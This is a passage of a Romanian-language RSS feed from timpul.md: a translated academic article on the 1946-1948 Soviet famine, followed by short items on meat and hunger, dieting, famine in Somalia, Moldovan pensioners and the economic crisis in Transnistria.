fermieri cu justificarea că statul are nevoie să facă rezerve pentru a-i ajuta mai t&acirc;rziu, să permită sf&acirc;rșirea raționalizării și pentru a garanta securitatea națională. Nu există niciun dubiu că, odată cu deteriorarea situației internaționale după 1947, ultimul motiv a devenit deosebit de important. Necesitatea unor stocuri de gr&acirc;ne substanțiale a apărut pentru prima dată &icirc;n 1936-1937, c&acirc;nd o recoltă proastă nu a dus la foamete, dar s-au &icirc;nregistrat c&acirc;țiva morți. O cauză pentru asta a constituit o singură recoltă scăzută (foametea dezastruoasă a anului 1933, precedată de două recolte succesive proaste, &icirc;n 1931 și 1932, iar foametea anului 1947 a fost precedată nu doar de recolta rea at&acirc;t din 1946, c&acirc;t și 1945). Un alt lucru ce merită să fie luat &icirc;n considerare sunt stocurile substanțiale de gr&acirc;ne deținute de stat la 1 iulie 1936, folosite &icirc;n 1936-1937, pentru a susține consumul. </p>
<p>&Icirc;n anii agricoli 1946-1947, rezervele statale de gr&acirc;ne s-au diminuat (cu 1.3 mln. tone), la fel cum au făcut stocurile de secară, furaj și gr&acirc;ne minore (cu 2.4 mln. tone), așa cum se poate aștepta &icirc;n condiții extreme de lipsă a hranei. Cu toate acestea, se &icirc;nregistrau cu 1.3 mln. tone mai mult dec&acirc;t la sf&acirc;rșitul anului agricol 1932-1933 (ultimul an pașnic de foamete). Această cantitate, de 1.3 mln. tone, era de ajuns să hrănească 4 mln. de oameni pe parcursul unui an. Și această cantitate determinată conform stocurilor la 1 iulie 1947 nu este sigură, dar o estimare rezonabilă permite să crească această cantitate p&acirc;nă la 2.8 mln. tone. <strong>Asta &icirc;nseamnă că surplusul putea fi folosit pentru a aproviziona populația cu o porție bună de p&acirc;ine și puteau alimenta oamenii &icirc;n caz de urgență. </strong></p>
<p><img loading="lazy" decoding="async" src="/uploads/images/5(38).jpg" width="600" height="401" alt="" /><br />
<img loading="lazy" decoding="async" src="/uploads/images/6(26).jpg" width="600" height="128" alt="" /></p>
<p><img loading="lazy" decoding="async" src="/uploads/images/7(23).jpg" width="600" height="414" alt="" /><br />
<img loading="lazy" decoding="async" src="/uploads/images/8(19).jpg" width="600" height="31" alt="" /></p>
<h1>C&acirc;te victime au fost?</h1>
<p>Numărul morților este aproximat la &bdquo;nu mai puțin de două milioane&rdquo;. Acest număr se explică printr-un milion de morți, cauzat de foamete, și un număr copleșitor de decese cauzate de boli ce &icirc;nsoțesc foametea. Cercetătorul Popov a ajuns la concluzia că Rusia a numărat peste un milion de morți cauzat de foamete &icirc;n anii 1946-1948, pe c&acirc;nd rata de natalitate a scăzut cu aproape două milioane &icirc;n comparație cu situația de dinainte de foamete, c&acirc;nd soldații demobilizați se &icirc;ntorceau la familiile lor. Astfel, pierderea demografică totală a Rusiei a adunat aproape trei milioane. Veselova a estimat pierderile Ucrainei plasate &icirc;ntre un milion și un milion și jumătate de morți, <strong>iar cercetătorii Țăran și Șișcanu au aproximat numărul morților moldoveni la 150-200 mii. </strong></p>
<p><strong>Foametea a &icirc;nceput &icirc;n a doua jumătate a anului 1946, după proasta recoltă din același an și colectivizările de către stat. </strong>Ce lună poate fi considerată &icirc;nceputul foametei? Corespondența oficială publicată recent arată că ministerele Securității de Stat ale Moldovei și Ucrainei au raportat deja morți &icirc;n octombrie 1946. Dacă vom compara datele despre populația Uniunii Sovietice din anul 1945 cu cele din 1946, vom descoperi că cele din perioada ianuarie &#8211; iunie 1946 sunt mai ridicate dec&acirc;t ale anului precedent, respectiv este rațional să considerăm luna iulie drept &icirc;nceputul foametei. </p>
<p>Și totuși care a fost numărul &icirc;nregistrat de morți &icirc;n a doua jumătate a anului 1946? Aici ne ciocnim cu o estimare crudă, care ignoră, de exemplu, faptul că declinul mortalității este și din cauza deceselor acelor oameni răniți &icirc;n cadrul celui de-al Doilea Război Mondial. <strong>Cu toate acestea, &icirc;n a doua jumătate a anului 1946 se &icirc;nregistrează cu 99 mii de morți mai mult dec&acirc;t &icirc;n aceeași perioadă &icirc;n 1945. Iar &icirc;n 1947, numărul morților a crescut cu 790 mii de decese &icirc;n comparație cu anul precedent. </strong></p>
<p><strong>Se știe că foametea a continuat &icirc;n 1948, acest fapt este consemnat &icirc;n mărturiile supraviețuitorilor și &icirc;n rapoartele oficiale contemporane. &Icirc;n 1948 numărul deceselor &icirc;nregistrate și cauzate de foamete ajunge la 181 mii.<br />
</strong><br />
Așadar, se poate remarca rata mortalității &icirc;n anii 1946-1948 din cauza foametei ce &icirc;nsumează 1.2 mln. morți. Dintre aceștia, majoritatea &ndash; aproximativ 76% &#8211; au avut loc &icirc;n anul 1947. Punctul culminant al foametei a fost atins &icirc;n intervalul februarie-august 1947. Date relevante &icirc;n acest sens pot fi urmărite &icirc;n tabelele 5 și 6.</p>
<p><img loading="lazy" decoding="async" src="/uploads/images/9(17).jpg" width="600" height="371" alt="" /></p>
<p><img loading="lazy" decoding="async" src="/uploads/images/10(17).jpg" width="600" height="229" alt="" /><br />
<img loading="lazy" decoding="async" src="/uploads/images/11(7).jpg" width="600" height="117" alt="" /></p>
<p>&Icirc;n 1947, decesele &icirc;nregistrate &icirc;n URSS au fost cu 790 mii mai numeroase dec&acirc;t &icirc;n 1946. Dacă estimăm rata mortalității pentru cele trei republici &icirc;ncep&acirc;nd cu cea de-a doua jumătate a anului 1946, anul 1947 și 1948, obținem 606 mii de morți &icirc;n Rusia sau circa 0.6% din totalul populației, 350 mii &icirc;n Ucraina (sau circa 1% din populație) și 123 mii ce poate fi estimat ca 5% din populație. [&hellip;]</p>
<p>Oficialitățile refuzau să &icirc;nregistreze morți ce &icirc;n mod normal le-ar fi &icirc;nregistrat, asta deoarece oamenii plecau de acasă &icirc;n căutare de hrană și mureau &icirc;n alte părți. De cele mai multe ori, cum se stipula &icirc;ntr-un raport al Ministerului Securității de Stat, corpurile lor ne&icirc;nsuflețite erau găsite pe marginile drumurilor sau pe c&acirc;mpuri. Este improbabil că toate aceste cadavre au fost identificate și introduse &icirc;n statisticile oficiale asupra populației. Mai mult dec&acirc;t at&acirc;t, multe dintre acestea au intrat &icirc;n putrefacție și nu au fost găsite pentru o perioadă lungă de timp.</p>
<p>Aceste argumente susțin ideea că statisticile oficiale minimalizează creșterea mortalității, &icirc;n special rurale, cauzate de foamete.</p>
<p>O modalitate pentru a determina care ar fi rata morților ne&icirc;nregistrate este să considerăm diferența dintre &icirc;nregistrările &icirc;n zonele rurale și urbane. Conform tabelului 6, mortalitatea urbană &icirc;nregistrată &icirc;n URSS, &icirc;n 1947 a crescut p&acirc;nă la 49.5%, pe c&acirc;nd mortalitatea rurală a crescut cu doar 37.9%. Acest fapt este dubios, &icirc;ntruc&acirc;t conform rapoartelor oficiale și mărturiilor celor ce-au supraviețuit, foametea a afectat &icirc;n mare parte localitățile rurale. [&hellip;]</p>
<p>Un fenomen răsp&acirc;ndit &icirc;n timpul foametei este o proporție mare a copiilor &icirc;n r&acirc;ndurile victimelor. 30% dintre decesele &icirc;nregistrate &icirc;n 1946-1947 au fost copii cu v&acirc;rsta p&acirc;nă la un an. O altă importantă categorie de victime o constituie familiile numeroase, unde tatăl a fost omor&acirc;t &icirc;n timpul războiului și nu mai poate furniza hrană pentru copii. Foamea a &icirc;mpins oamenii la acte de canibalism. Există rapoarte conform cărora cadavrele proaspete ale oamenilor ce au murit &icirc;n mod natural erau folosite pentru hrană sau acte de omor pentru carne de om. </p>
<h1>Largi aprovizionări cu hrană ca modalitate de a reduce foametea</h1>
<p>Sen a considerat că printre metodele luptei cu foametea cea mai importantă e aprovizionarea masivă cu hrană, indiferent de cauza ce-a declanșat foametea. Această politică de acumulare a stocurilor de alimente și gr&acirc;ne a fost cu succes implementată și a salvat multe vieți &icirc;n condițiile c&acirc;nd foametea amenința viețile oamenilor. Printre exemple se numără Anglia secolului XVII și URSS din anii 1936-1937. Cu toate acestea, metoda nu este universal aplicabilă. &Icirc;nsuși Sen sprijină mai multe strategii de susținere, printre care crearea locurilor de muncă. El este conștient că un sistem de porționare ce se limitează la populația urbană nu va putea stopa foametea din zonele rurale, ce o poate, din contra, &icirc;nrăutăți. El a descris cum &icirc;n Bengal &icirc;n 1943, populația din Calcutta avea posibilitatea de a obține hrană prin intermediul porționării hranei și magazinelor &bdquo;controlate&rdquo;, pe c&acirc;nd aproximativ 3 mln. de lucrători agricoli, fermieri, pescari și alți locuitori ai satelor, cei care au fost excluși din sistemul de porționare, au murit din cauza &icirc;nfometării sau a bolilor. </p>
<p><strong>Recomandarea unei masive aprovizionări cu hrană presupune ca autoritățile să privească foametea drept o prioritate. Prioritățile sovietice &icirc;n anii 1946-1948 erau totuși diferite. Prioritatea de top a politicii sovietice referitoare la alimentație era să faciliteze sistemul de porționare ca acesta să funcționeze eficient și să salveze vieți. Cea de-a doua prioritate consista &icirc;n a acumula stocuri de gr&acirc;ne după măsura posibilităților.</strong> Politica sovietică practicată &icirc;n 1946-1947 corespundea cu cele &icirc;ntrebuințate anterior. De exemplu, pe parcursul celui de-al Doilea Război Mondial, puterea URSS obișnuia să hrănească forțele armate și să livreze hrană populației urbane, &icirc;n special pentru Moscova. <strong>Porționarea hranei nu era extinsă asupra populației rurale, nevoite să reziste fără ajutor. &Icirc;n mod asemănător, o reacție a autorităților sovietice &icirc;n fața dificultăților alimentare a fost de a interzice comercializarea cu făină și p&acirc;ine &icirc;n localitățile rurale &icirc;n anii 1939-1940. </strong>Puterea sovietică avea mari probleme de susținere alimentară a localităților urbane, cu at&acirc;t mai puțin cele rurale.<strong> De exemplu, &icirc;n anii 1928-1933 și anii războiului civil, țăranii au fost &icirc;n totalitate excluși din programul porționării hranei. Ei au fost lăsați să se descurce de sine stătător. </p>
<p>Totuși, &icirc;n condițiile existente &icirc;n URSS &icirc;n anii 1946-1947, masiva cantitate de hrană aflată &icirc;n m&acirc;inile statului este considerată de istoricii de astăzi una dintre cauzele foametei. </strong>&Icirc;n acele condiții, aprovizionarea cu hrană nu ajuta la stoparea foametei. De ce? Deoarece stocurile aflate &icirc;n posesia statului reprezentau o cerință obligatorie pentru toți țăranii, siliți să-și predea proviziile. <strong>&Icirc;n cel de-al doilea r&acirc;nd, statul folosea aceste cantități de hrană pentru a le exporta, &icirc;n pofida foametei din interiorul Uniunii. Iar cei mai săraci, care aveau o mare nevoie de a obține hrană, erau excluși din sistemul de porționare. Din alt punct de vedere, o mare cantitate de hrană, provenită &icirc;n mare parte din zonele rurale, era transportată spre cele urbane și o parte a acesteia se pierdea pe parcursul deplasării sau depozitării.</strong> </p>
<p>Trebuie menționat, totuși, că autoritățile sovietice au slăbit ușor foametea din 1946-1947. Au redus colectivizarea gr&acirc;nelor &icirc;n 1946 pentru c&acirc;teva regiuni teribil de afectate, cum a fost Moldova. Au &icirc;mprumutat semințe c&acirc;torva regiuni ce trebuiau să fie &icirc;ntoarse cu dob&acirc;ndă după recolta anului viitor. Autoritățile au asigurat distribuirea unor supe de pui &icirc;n spitale, grădinițe și fermelor colective ca acestea să poată asigura recolta anului 1947. O parte a acestui ajutor a fost ineficient, &icirc;ntruc&acirc;t a fost &icirc;ntors odată cu procesul de colectivizare forțată sau deturnat &icirc;nainte de a ajunge la beneficiari. Ajutor a venit și din partea organizațiilor străine. <strong>Organizația Națiunilor Unite pentru Reabilitare Administrativă (UNRRA) a livrat ajutor substanțial Ucrainei și Republicii Belarus &ndash; 250 milioane de dolari, o parte din această sumă fiind alimente și ajutor pentru reconstrucția de după război. Organizația Crucea Roșie și Organizația de caritate &bdquo;Russian Relief&rdquo; a transmis ajutoare Uniunii Sovietice &icirc;n valoare de 31 de milioane de dolari. </strong>Fără acest ajutor, rata mortalității ar fi fost și mai &icirc;naltă. Cu toate acestea, eforturile au fost inadecvate și nu au reușit să prevină mortalitatea substanțială. </p>
<h1>Clasificarea foametei</h1>
<p>Astăzi, istorici din Rusia, Ucraina și Moldova, ca Popov, Veselova, Țăran și Șișcanu &icirc;nvinuiesc autoritățile sovietice și politica de alimentare din acea perioadă pentru foametea din 1947. <strong>Dacă taxele erau mai joase, colectivizarea mai puțin agresivă, dacă nu se exporta &icirc;n asemenea cantități, dacă importurile erau mai substanțiale, dacă puterea folosea stocurile de gr&acirc;ne pentru a potoli foametea, dacă autoritățile nu acumulau gr&acirc;ne &icirc;n perioada de maximă foamete, c&acirc;nd oamenii mureau de &icirc;nfometare, atunci probabil nu erau at&acirc;ția morți.</strong> Totuși, este la fel de adevărat, că punctul culminant al foametei a fost &icirc;n 1947 după o recoltă proastă din 1946.</p>
<p>Dacă e să admitem că vremea reprezintă un factor invariabil, iar politicile sovietice de alimentație &#8211; &icirc;n stare de a fi schimbate, foametea a fost cauzată de politicile greșite. Dacă se consideră politicile ca pe niște elemente invariabile, iar condițiile meteorologice ca pe un fapt dat, atunci foametea a fost cauzată de vremea proastă a acelui an. &Icirc;n viziunea autorului de față, &icirc;n anii 1945-1953, politicile erau stabilite și factorul care determina dacă va fi sau nu foamete &icirc;n acel an&#8230; era vremea. Acesta este adevărul conducerii țariste. </p>
<p><img loading="lazy" decoding="async" src="/uploads/images/deportati2.jpg" width="300" height="221" alt="" /></p>
<p><strong>Dacă cineva vrea să știe de ce a fost foamete &icirc;n anii 1947, atunci răspunsul este seceta anului 1946 care a dus la recoltă proastă și, respectiv, deficit acut de hrană pe parcursul anului agricol 1946-1947. </strong><strong>Pe de altă parte, dacă cineva vrea să știe de ce Uniunea Sovietică era vulnerabilă &icirc;n fața foametei &icirc;n anii 1945-1953, atunci răspunsul este diferit și rezultă din combinația a șase factori.</strong> Primul &ndash; din motive geografice și meteorologice, unele dintre cele mai importante arii agricole erau predispuse unor secete severe. Aceasta este o problemă binecunoscută a agriculturii rusești, ce datează &icirc;nainte de formarea Uniunii Sovietice și este relevantă și după prăbușirea acesteia (cum ar fi seceta din 1998). Un alt motiv ar fi taxele ridicate și colectivizarea forțată, ceea ce lipsea populația de posibilitatea de a-și furniza hrană. Standardele de trai ale populației erau joase, iar rezervele insuficiente pentru a le asigura supraviețuirea unui an cu o recoltă proastă. Un alt factor decisiv au constituit restricțiile impuse de puterea sovietică ce interziceau proprietatea privată. La fel de important este nivelul producției agricole, care a fost deosebit de scăzut. &Icirc;n perioada anilor 1953-1991, secetele recurente nu cauzau foamete, deoarece liderii post-staliniști au abandonat colectivizarea forțată, au urmat o politică bazată pe o relativă egalitate, au importat gr&acirc;ne &icirc;n cantități mari și au stabilit drept prioritate menținerea și &icirc;mbunătățirea standardelor de viață.</p>
<p><strong>Astăzi, merită să menționăm că după foametea din 1947 a urmat o cădere drastică a producției. Din acest punct de vedere, ea diferă colosal de acele fenomene de foamete ce s-au &icirc;nt&acirc;mplat fără o scădere bruscă a disponibilității hranei. Foametea din 1947 poate fi clasată &icirc;ntr-o categorie alternativă asociată cu un declin acut al producției domestice de alimente. </strong></p>
<p>Totuși, pentru precizie, e bine să facem diferența dintre cele două tipuri de perioade de foamete. Primul tip de foamete se &icirc;nt&acirc;mplă atunci c&acirc;nd nu există o realizabilă &icirc;mpărțire a hranei disponibile ce ar putea preveni foametea. Cel de-al doilea tip de foamete este atunci c&acirc;nd &icirc;n pofida declinului disponibilității de hrană există politici care ar fi putut preveni catastrofa. Foametea din 1947 se clasează &icirc;n cea de-a doua categorie. </p>
<p>Totuși, acest mod de abordare a problemei ne ajută să &icirc;nțelegem foamea din 1947 &icirc;n c&acirc;teva feluri. &Icirc;n primul r&acirc;nd, cei care au murit nu au avut &bdquo;dreptul la hrană&rdquo;, cum ar fi zonele rurale. Cei care au avut acces la alimente &ndash; &icirc;n mare parte aglomerațiile urbane, angajatorii ce beneficiau de porțiile oferite de stat &ndash; au supraviețuit. <strong>Decesele  din cauza foametei nu au fost o consecință a unui dezastru natural, ci au fost mediate de către sistemul sovietic de guvernare. Dacă politicile puterii erau să fie diferite, foametea putea fi evitată &icirc;n ciuda secetei acelui an. <br />
</strong><br />
<em><strong>Traducere de Victoria Colesnic a unui articol din </strong></em><a href="http:// http://www.paulbogdanor.com/left/soviet/famine/ellman1947.pdf"><em><strong>Cambridge Journal of Economics</strong></em></a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/document-traducere-din-cambridge-journal-of-economics-foametea-sovietica-din-1947-47262.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Consumul de carne nu este benefic pentru organism. Foamea exagerată este o avertizare</title>
		<link>https://timpul.md/articol/consumul-de-carne-nu-este-benefic-pentru-organism-foamea-exagerata-este-o-avertizare-128357.html</link>
					<comments>https://timpul.md/articol/consumul-de-carne-nu-este-benefic-pentru-organism-foamea-exagerata-este-o-avertizare-128357.html#respond</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Tue, 20 Mar 2018 04:48:00 +0000</pubDate>
				<category><![CDATA[Actualitate]]></category>
		<category><![CDATA[carne]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[organismul]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/consumul-de-carne-nu-este-benefic-pentru-organism-foamea-exagerata-este-o-avertizare-128357.html/</guid>

					<description><![CDATA[Dacă după ce măn&#226;nci carne &#238;ţi este foame, acesta este semnalul că organismul tău nu digeră corespunzător acest aliment.<br />]]></description>
										<content:encoded><![CDATA[<p>Consumul de carne a iscat destule controverse de-a lungul anilor, astfel că astăzi avem o diversitate de planuri dietetice cu sau fără carne.</p>
<p>Fiind un subiect destul de sensibil, consumul de carne pentru anumite persoane poate fi un risc, &icirc;n timp ce pentru o altă categorie de oameni reprezintă una dintre cele mai mari plăceri culinare.</p>
<p>Pentru a-ţi păstra sănătatea timp &icirc;ndelungat este necesar să-ţi &icirc;nveţi şi să &icirc;ţi asculţi corpul, deoarece acesta &icirc;ţi transmite semnale constant, mai ales atunci c&acirc;nd se loveşte de anumite impedimente &icirc;n a digera carnea. </p>
<p><strong>Constipaţia </strong><br />
Este unul dintre cele mai periculoase simptome cu care te poţi confunta, deoarece, nedepistat la timp, se poate croniciza. Pentru ca organismul tău să fie sănătos are nevoie de un tranzit corespunzător care să elimine toxinele &icirc;ntr-un timp relativ  scurt. Un consum ridicat de carne poate &icirc;ngreua cu mult acest proces, &icirc;n special din cauza grăsimilor conţinute. </p>
<p><strong>Foamea exagerată, semnal de avertizare</strong><br />
Un consum mare de carne &icirc;nseamnă un aport mare de proteine &icirc;n organism, iar asta la r&acirc;ndul său va declanşa o senzaţie permanentă de foame.</p>
<p><strong>Sursa: adevarul.ro</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/consumul-de-carne-nu-este-benefic-pentru-organism-foamea-exagerata-este-o-avertizare-128357.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cum prelungim senzaţia de saţietate</title>
		<link>https://timpul.md/articol/cum-prelungim-senzatia-de-satietate-127922.html</link>
					<comments>https://timpul.md/articol/cum-prelungim-senzatia-de-satietate-127922.html#respond</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Sat, 03 Mar 2018 11:29:00 +0000</pubDate>
				<category><![CDATA[Actualitate]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[sanatate]]></category>
		<category><![CDATA[Sațietate]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/cum-prelungim-senzatia-de-satietate-127922.html/</guid>

					<description><![CDATA[Una dintre cele mai neplăcute senzaţii mai ales atunci c&#226;nd eşti la dietă este senzaţia de foame constantă. <br />
<br />]]></description>
										<content:encoded><![CDATA[<p>Pentru o siluetă frumoasă ai nevoie să te alimentezi corect, la timp, iar pentru ca frumuseţea ta să fie şi sănătoasă ai nevoie de c&acirc;t mai multă mişcare, hidratare şi nu &icirc;n ultimul r&acirc;nd de odihnă.  </p>
<p>Dieta o urmezi o perioadă scurtă de timp, după care, dacă apuci să o ţii p&acirc;nă la final, te vei &icirc;ntoarce la vechile tale obiceiuri. Astfel metabolismul va fi &icirc;n permanenţă dat peste cap şi vor apărea şi alte probleme de sănătate.</p>
<p>Altfel, c&acirc;nd alegi să &icirc;i oferi un aport caloric extrem de scăzut organismului tău, aceasta va &icirc;ncepe să facă provizii şi vei observa imediat cum &icirc;ncepi să iei &icirc;n greutate.</p>
<p>Sursa: Adevarul.ro</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/cum-prelungim-senzatia-de-satietate-127922.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Peste 100 de persoane din Somalia au murit de foame, în ultimele 48 de ore</title>
		<link>https://timpul.md/articol/peste-100-de-persoane-din-somalia-au-murit-de-foame-in-ultimele-48-de-ore-105915.html</link>
					<comments>https://timpul.md/articol/peste-100-de-persoane-din-somalia-au-murit-de-foame-in-ultimele-48-de-ore-105915.html#respond</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Mon, 06 Mar 2017 07:35:00 +0000</pubDate>
				<category><![CDATA[Internațional]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[Somalia]]></category>
		<category><![CDATA[victime]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/peste-100-de-persoane-din-somalia-au-murit-de-foame-in-ultimele-48-de-ore-105915.html/</guid>

					<description><![CDATA[Peste 100 de persoane au murit de foame &#238;n ultimele 48 de ore, &#238;ntr-o regiune din Somalia, afectată de secetă, potrivit premierului somalez.]]></description>
										<content:encoded><![CDATA[<p>Marţi, statul somalez a declarat stare de dezastru. Au existat anterior avertizări de foamete &icirc;n Yemen, Somalia şi nord-estul Nigeriei.</p>
<p>ONU estimează că cinci milioane de persoane din Somalia au nevoie urgentă de ajutor.</p>
<p>Mii de persoane au ajuns &icirc;n ultimele zile &icirc;n capitala Mohadishu pentru a căuta ajutoare alimentare, 7.000 de oameni strămutaţi pe plan intern caz&icirc;ndu-se &icirc;ntr-un centru pentru a avea acces la hrană.</p>
<p>Aproximativ 360.000 de copii subnutriţi au nevoie urgentă de tratament, 71.000 dintre aceştia afl&icirc;ndu-se &icirc;ntr-o stare gravă.</p>
<p>Guvernul a comunicat că foametea creşte vulnerabilitatea oamenilor &icirc;n faţa exploatării, abuzurilor drepturilor omului, reţelelor infracţionale şi teroriste.</p>
<p>Sursa: Moldpres</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/peste-100-de-persoane-din-somalia-au-murit-de-foame-in-ultimele-48-de-ore-105915.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Blestemul de a fi bătrân</title>
		<link>https://timpul.md/articol/blestemul-de-a-fi-batran-99348.html</link>
					<comments>https://timpul.md/articol/blestemul-de-a-fi-batran-99348.html#respond</comments>
		
		<dc:creator><![CDATA[Tatiana T. Macovei]]></dc:creator>
		<pubDate>Fri, 21 Oct 2016 07:19:00 +0000</pubDate>
				<category><![CDATA[Bună Dimineața]]></category>
		<category><![CDATA[ALEGERI]]></category>
		<category><![CDATA[bătrân]]></category>
		<category><![CDATA[campanie]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[moldova]]></category>
		<category><![CDATA[pensie]]></category>
		<category><![CDATA[saracie]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/blestemul-de-a-fi-batran-99348.html/</guid>

					<description><![CDATA[&#206;mi aduc aminte bunica mea avea o vorbă: muncesc acum c&#226;t sunt t&#226;nără și &#238;n putere pentru a-mi trăi bătr&#226;nețele frumos. Anii au trecut, iar bunicuța mea a simțit și ea &#238;mpreună cu alții de v&#226;rsta ei cum e să fii bătr&#226;nă &#238;n Republica Moldova.]]></description>
										<content:encoded><![CDATA[<p>Pentru un pensionar, chinuit de ani buni de muncă, cea mai buna vestea este cea pe care o aduce poștașul, adică pensia. Imediat banuții sunt &icirc;mpărțiți pentru facturi, ceva se pune &icirc;n basmaluță pentru duminica la biserică, iar chipul pensionarului nostru se m&acirc;hnește la loc căci să &icirc;și cumpere ceva de m&acirc;ncare nu &icirc;i mai ajunge. </p>
<p>Si mai greu e c&acirc;nd vin sărbătorile. Dacă tineretul de azi trece usor peste tradiții și obiceiuri, bătr&acirc;nii nu o pot face at&acirc;t de simplu. Ei &icirc;ncă vor să fie ca pe vremuri, masa plină cu de toate, iar la masă de jur &icirc;mprejur cei dragi. Dar nu mai e ca ieri. Sunt zeci de bătr&acirc;nei care stau azi &icirc;n stradă si v&acirc;nd ce pot, ce au prin casă. Sunt bătr&acirc;nei cărora demnitatea si cinstea nu le permite să se umilească &icirc;n așa hal &icirc;nc&acirc;t să cerșească pe la semafor. </p>
<p>Zilele trecute fratele meu a venit acasă cu un snop de mărar. Mama nedumerită, &icirc;l &icirc;ntreabă de ce a cumpărat mărar c&acirc;nd numai de mărar nu aveam nevoie &icirc;n casă. Acesta, cu toată duritatea lui de bărbat i-a spus: &rdquo;Mi s-a făcut milă de o bătr&acirc;nică ce vindea &icirc;n piață, jos pe asfalt, mărar de la ea din grădină. Nu am putut să trec indiferent pe l&acirc;ngă ea. Mi s-a &icirc;nmuiat sufletul&rdquo;.</p>
<p>Iar cazuri de acest fel sunt zeci poate chiar sute. Bătr&acirc;nii demult și-au pierdut sperața &icirc;n cei de la guvernare. Ei știu prea bine că politicienii profită de necazul lor, mai ales acum &icirc;n campania electorală.</p>
<p>Domnilor candidați, care acum &icirc;n campania electorală ați face orice numai, numai să vă voteze acești oameni amăr&acirc;ți, eu zic să vă suflecaţi m&acirc;necile de la cămaşă  și să &icirc;ncepeți a c&acirc;rpi casele pensionarilor că și așa se dăr&acirc;mă, să scoateci vacile la păscut, oile, iar pensionarul măcar &icirc;n campanie să se simtă pupat undeva, că după alegeri, devine din nou bătaia voastră de joc.</p>
<p>P.S: Pensia medie &icirc;n Republica Moldova a fost la &icirc;nceputul lunii octombrie de 1278 de lei şi a crescut cu 100 lei comparativ cu anul 2015, arată datele Casei Naţionale de Asigurări Sociale. Lu&acirc;nd &icirc;n considerare tarifele majorate la energia termică, pensionarilor le va ajunge pensia doar pentru a achita o gigacalorie de energie termică (1068,22 lei) şi pentru o p&acirc;ine pe zi.<br />
&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/blestemul-de-a-fi-batran-99348.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Transnistria: „De foame încă nu murim!”</title>
		<link>https://timpul.md/articol/transnistria-de-foame-inca-nu-murim-94412.html</link>
					<comments>https://timpul.md/articol/transnistria-de-foame-inca-nu-murim-94412.html#respond</comments>
		
		<dc:creator><![CDATA[Georgeta Carasiucenco]]></dc:creator>
		<pubDate>Fri, 24 Jun 2016 05:57:00 +0000</pubDate>
				<category><![CDATA[Actualitate]]></category>
		<category><![CDATA[foame]]></category>
		<category><![CDATA[reportaj]]></category>
		<category><![CDATA[Tiraspol]]></category>
		<category><![CDATA[transnistria]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/transnistria-de-foame-inca-nu-murim-94412.html/</guid>

					<description><![CDATA[Regiunea transnistreană se confruntă cu o profundă criză economică. Nu există valută străină, iar oamenii nu pot pleca de acasă. Salariile și pensiile au fost reținute, iar magazinele sunt pustii. Cam asta scrie presa de la Chișinău. Am decis să mergem &#238;n Transnistria, &#238;n orașul Tiraspol să vedem ce se &#238;nt&#226;mplă acolo cu adevărat și ce spun oamenii.]]></description>
										<content:encoded><![CDATA[<p>Drumurile ce duc spre est, spre capitala regiunii separatiste, durează două ore. Ca să intri pe teritoriul Republicii Moldovenești Nistrene, trebuie să te &icirc;nregistrezi la vamă, cu buletinul, &icirc;n ghișeul unde așteaptă doi ofițeri. &Icirc;n timp ce responsabilul de la ghișeu &icirc;ntreabă despre scopul vizitei, adresa exactă la care vii, portretul lui Evgheni Șevciuk te privește de pe perete. </p>
<p>Microbuzul m-a dus &icirc;nt&acirc;i prin Bender, apoi &icirc;n capitala regiunii transnistrene. Ambele orașe mi s-au părut cam la fel. Am văzut clădiri sovietice și străzi curate cu oameni puțini, panglica &bdquo;Sf&acirc;ntului Gheorghe&rdquo; pe ferestrele microbuzelor și schimburi valutare &icirc;nchise. Mi-a sărit &icirc;n ochi și o altă particularitate: lipsa gheretelor ce se &icirc;nt&acirc;lnesc la fiecare colț de stradă &icirc;n Chișinău.</p>
<h1>Tiraspol vs. Chișinău: &bdquo;La noi e mai scump dec&acirc;t la voi&rdquo;</h1>
<p>Mă apropii de o femeie să o &icirc;ntreb, &icirc;n rusă, c&acirc;t costă o p&acirc;ine la ei. Ea, după ce m-a auzit vorbind  cu un prieten, &icirc;mi răspunde &icirc;ntr-o rom&acirc;nă st&acirc;lcită: &bdquo;Cea mai ieftină e trei ruble. Dar așa, costă p&acirc;nă la șase ruble. Anul acesta tot s-a scumpit. Aici la noi, &icirc;n Transnistria, e mai scump. Nu-i nici valută străină, nici măcar lei, și din această cauză nu poți să ieși din regiune&rdquo;, spune doamna.</p>
<p><img loading="lazy" decoding="async" src="/uploads/images/20160620_111155.jpg" width="650" height="488" alt="" /></p>
<p>Criza valutară o confirmă și v&acirc;nzătoarea de la punctul de schimb valutar. Pentru 100 de lei am primit 63 de ruble, cu care poți să cumperi aproape un kilogram de bomboane &bdquo;Bucuria&rdquo;. Iar dacă mai răm&acirc;n ruble transnistrene și trebuie convertiți &icirc;n lei, atunci nu poți. &bdquo;Eu am acum doar suta voastră de lei. Dar puteți &icirc;ncerca &icirc;n oraș, dacă reușiți. Așa e la noi situația. E greu cu valuta, pentru că toată este cumpărată&rdquo;, a fost explicația tinerei de după ferestruica ghișeului. Pentru că lipsesc dolarii, euro, hrivnele și leii moldovenești, oamenii nu pot să-i cumpere, ca să se deplaseze &icirc;n afara regiunii.</p>
